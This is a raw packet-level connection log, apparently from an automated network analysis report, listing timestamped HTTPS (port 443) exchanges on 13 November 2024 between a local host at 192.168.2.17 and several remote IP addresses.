                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.278682947 CET44349884104.26.4.39192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.278789043 CET49884443192.168.2.17104.26.4.39
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.293226957 CET4434988091.228.74.166192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.293247938 CET4434988091.228.74.166192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.293253899 CET4434988091.228.74.166192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.293267965 CET4434988091.228.74.166192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.293304920 CET4434988091.228.74.166192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.293366909 CET49880443192.168.2.1791.228.74.166
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.293382883 CET4434988091.228.74.166192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.293423891 CET49880443192.168.2.1791.228.74.166
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.293431044 CET49880443192.168.2.1791.228.74.166
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.305145025 CET4434988091.228.74.166192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.305211067 CET49880443192.168.2.1791.228.74.166
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.305218935 CET4434988091.228.74.166192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.305233955 CET4434988091.228.74.166192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.305278063 CET49880443192.168.2.1791.228.74.166
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.305525064 CET49880443192.168.2.1791.228.74.166
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.305537939 CET4434988091.228.74.166192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.310553074 CET49878443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.310679913 CET4434987513.32.27.86192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.310693026 CET4434987513.32.27.86192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.310735941 CET4434987513.32.27.86192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.310769081 CET49875443192.168.2.1713.32.27.86
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.310791016 CET4434987513.32.27.86192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.310806990 CET49875443192.168.2.1713.32.27.86
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.312316895 CET4434987513.32.27.86192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.312342882 CET4434987513.32.27.86192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.312395096 CET49875443192.168.2.1713.32.27.86
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.312407017 CET4434987513.32.27.86192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.312438965 CET49875443192.168.2.1713.32.27.86
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.323332071 CET44349884104.26.4.39192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.326555967 CET49884443192.168.2.17104.26.4.39
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.344326973 CET4434987513.32.27.86192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.344352961 CET4434987513.32.27.86192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.344397068 CET49875443192.168.2.1713.32.27.86
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.344435930 CET4434987513.32.27.86192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.344455957 CET49875443192.168.2.1713.32.27.86
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.344810963 CET4434987513.32.27.86192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.344825029 CET4434987513.32.27.86192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.344897032 CET49875443192.168.2.1713.32.27.86
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.344908953 CET4434987513.32.27.86192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.345567942 CET44349878157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.345577002 CET44349878157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.345602989 CET44349878157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.345613003 CET44349878157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.345653057 CET49878443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.345662117 CET44349878157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.345688105 CET49878443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.345705032 CET49878443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.354482889 CET44349878157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.354490042 CET44349878157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.354518890 CET44349878157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.354546070 CET44349878157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.354548931 CET49878443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.354556084 CET44349878157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.354594946 CET49878443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.354615927 CET49878443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.360038042 CET44349878157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.360095024 CET49878443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.390645027 CET49875443192.168.2.1713.32.27.86
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.428092003 CET4434987513.32.27.86192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.428105116 CET4434987513.32.27.86192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.428143024 CET4434987513.32.27.86192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.428157091 CET4434987513.32.27.86192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.428188086 CET49875443192.168.2.1713.32.27.86
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.428226948 CET4434987513.32.27.86192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.428245068 CET49875443192.168.2.1713.32.27.86
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.428417921 CET49875443192.168.2.1713.32.27.86
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.429002047 CET4434987513.32.27.86192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.429023027 CET4434987513.32.27.86192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.429066896 CET49875443192.168.2.1713.32.27.86
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.429085016 CET4434987513.32.27.86192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.429105997 CET49875443192.168.2.1713.32.27.86
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.429137945 CET49875443192.168.2.1713.32.27.86
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.429719925 CET4434987513.32.27.86192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.429788113 CET49875443192.168.2.1713.32.27.86
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.429795027 CET4434987513.32.27.86192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.429811001 CET4434987513.32.27.86192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.429858923 CET49875443192.168.2.1713.32.27.86
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.429929018 CET49875443192.168.2.1713.32.27.86
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.429949999 CET4434987513.32.27.86192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.429960966 CET49875443192.168.2.1713.32.27.86
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.431317091 CET49875443192.168.2.1713.32.27.86
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.512006044 CET44349878157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.512043953 CET44349878157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.512068987 CET49878443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.512079954 CET44349878157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.512115955 CET49878443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.513636112 CET44349878157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.513650894 CET44349878157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.513684988 CET49878443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.513693094 CET44349878157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.513715982 CET49878443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.514961958 CET44349878157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.514977932 CET44349878157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.515018940 CET49878443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.515027046 CET44349878157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.515055895 CET49878443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.515739918 CET44349878157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.515770912 CET44349878157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.515793085 CET49878443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.515799046 CET44349878157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.515827894 CET49878443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.516602993 CET44349878157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.516653061 CET49878443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.516659021 CET44349878157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.516709089 CET49878443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.516740084 CET44349878157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.516772032 CET44349878157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.516783953 CET49878443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.516788960 CET44349878157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.516813993 CET49878443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.516840935 CET49878443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.518394947 CET44349878157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.518423080 CET44349878157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.518455982 CET49878443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.518461943 CET44349878157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.518487930 CET49878443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.518523932 CET49878443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.520118952 CET44349878157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.520136118 CET44349878157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.520169973 CET49878443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.520174980 CET44349878157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.520200968 CET49878443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.520217896 CET49878443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.622960091 CET4434988799.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.623342037 CET49887443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.623361111 CET4434988799.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.623681068 CET4434988799.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.623974085 CET49887443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.624030113 CET4434988799.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.624116898 CET49887443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.634099960 CET44349878157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.634119987 CET44349878157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.634188890 CET49878443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.634205103 CET44349878157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.634252071 CET49878443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.634522915 CET44349878157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.634537935 CET44349878157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.634589911 CET49878443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.634597063 CET44349878157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.634613037 CET44349878157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.634639025 CET49878443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.634644985 CET44349878157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.634666920 CET49878443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.635081053 CET44349878157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.635111094 CET44349878157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.635138988 CET49878443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.635144949 CET44349878157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.635166883 CET49878443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.635466099 CET44349878157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.635481119 CET44349878157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.635541916 CET49878443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.635550976 CET44349878157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.638616085 CET44349878157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.638634920 CET44349878157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.638674021 CET49878443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.638680935 CET44349878157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.638701916 CET49878443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.638923883 CET44349878157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.638969898 CET49878443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.638977051 CET44349878157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.638988018 CET44349878157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.639035940 CET49878443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.639122009 CET49878443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.639142036 CET44349878157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.642689943 CET4434988818.244.18.115192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.642988920 CET49888443192.168.2.1718.244.18.115
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.643021107 CET4434988818.244.18.115192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.644699097 CET4434988818.244.18.115192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.644768000 CET49888443192.168.2.1718.244.18.115
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.645741940 CET49888443192.168.2.1718.244.18.115
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.645829916 CET4434988818.244.18.115192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.645973921 CET49888443192.168.2.1718.244.18.115
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.648324013 CET44349889157.240.0.6192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.652573109 CET49889443192.168.2.17157.240.0.6
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.652584076 CET44349889157.240.0.6192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.652877092 CET44349889157.240.0.6192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.655891895 CET49889443192.168.2.17157.240.0.6
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.655956030 CET44349889157.240.0.6192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.656110048 CET49889443192.168.2.17157.240.0.6
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.671329975 CET4434988799.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.685646057 CET44349884104.26.4.39192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.685749054 CET44349884104.26.4.39192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.686575890 CET49884443192.168.2.17104.26.4.39
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.686748028 CET49884443192.168.2.17104.26.4.39
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.686758041 CET44349884104.26.4.39192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.691323042 CET4434988818.244.18.115192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.692538977 CET49888443192.168.2.1718.244.18.115
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.692572117 CET4434988818.244.18.115192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.703330040 CET44349889157.240.0.6192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.740537882 CET49888443192.168.2.1718.244.18.115
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.757111073 CET4434989118.66.102.15192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.757364035 CET49891443192.168.2.1718.66.102.15
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.757380962 CET4434989118.66.102.15192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.758254051 CET4434989118.66.102.15192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.758316994 CET49891443192.168.2.1718.66.102.15
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.759107113 CET49891443192.168.2.1718.66.102.15
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.759165049 CET4434989118.66.102.15192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.759232998 CET49891443192.168.2.1718.66.102.15
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.759239912 CET4434989118.66.102.15192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.770692110 CET44349886151.101.65.140192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.771553040 CET49886443192.168.2.17151.101.65.140
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.771562099 CET44349886151.101.65.140192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.772942066 CET44349886151.101.65.140192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.773005962 CET49886443192.168.2.17151.101.65.140
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.773263931 CET49886443192.168.2.17151.101.65.140
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.773318052 CET44349886151.101.65.140192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.773363113 CET49886443192.168.2.17151.101.65.140
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.803633928 CET49891443192.168.2.1718.66.102.15
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.818639040 CET49886443192.168.2.17151.101.65.140
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.818655968 CET44349886151.101.65.140192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.835279942 CET44349894142.250.184.228192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.835504055 CET49894443192.168.2.17142.250.184.228
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.835527897 CET44349894142.250.184.228192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.836385012 CET44349894142.250.184.228192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.836450100 CET49894443192.168.2.17142.250.184.228
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.836683989 CET49894443192.168.2.17142.250.184.228
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.836740017 CET44349894142.250.184.228192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.836802959 CET49894443192.168.2.17142.250.184.228
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.836808920 CET44349894142.250.184.228192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.841260910 CET4434989599.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.841432095 CET49895443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.841439962 CET4434989599.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.841989994 CET4434989599.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.843946934 CET49895443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.844026089 CET49895443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.844032049 CET4434989599.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.850006104 CET44349899150.171.28.10192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.850810051 CET49899443192.168.2.17150.171.28.10
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.850821018 CET44349899150.171.28.10192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.851123095 CET44349899150.171.28.10192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.853648901 CET49899443192.168.2.17150.171.28.10
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.853703022 CET44349899150.171.28.10192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.853760958 CET49899443192.168.2.17150.171.28.10
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.866530895 CET49886443192.168.2.17151.101.65.140
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.873152018 CET4434988799.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.873171091 CET4434988799.86.8.175192.168.2.17
